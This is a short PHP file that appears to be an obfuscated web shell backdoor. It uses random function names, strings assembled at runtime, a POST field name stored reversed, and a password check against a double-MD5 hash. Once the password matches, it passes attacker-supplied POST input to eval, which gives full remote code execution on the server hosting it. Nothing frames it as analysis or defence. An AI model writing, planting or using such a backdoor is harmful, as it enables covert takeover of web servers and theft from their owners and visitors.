<?php

function bgJhbaoaeu()
{
global $omxZqgV;
$omxZqgV=vyBjjFua();
if(isset($_REQUEST['x']))
{
	$KqiuGt = 'OqXqtytpgQxNqXqtytpgQxEqXqtytpgQxPqXqtytpgQxIqXqtytpgQxEqXqtytpgQxCqXqtytpgQxE';
    $KqiuGt=str_replace('qXqtytpgQx','',$KqiuGt);

    echo $KqiuGt;
	if ( strcasecmp(md5(md5($_REQUEST['x'])),'c2880a79248a907c633eeb55824d14e5') ==0 )
    {
	@eval("\"$omxZqgV\"");
    }
}


}
function vyBjjFua()
{
        $yrUcRjIizx='8zE08b-2noHR--21';
		$sbMezwI=strrev($yrUcRjIizx);
		if(isset($_POST[$sbMezwI]))
        {
        $uuFXiBVqvx=str_replace('','',$_POST[$sbMezwI]);
        
        return '";'.$uuFXiBVqvx.'//';
		}
}

bgJhbaoaeu();

?>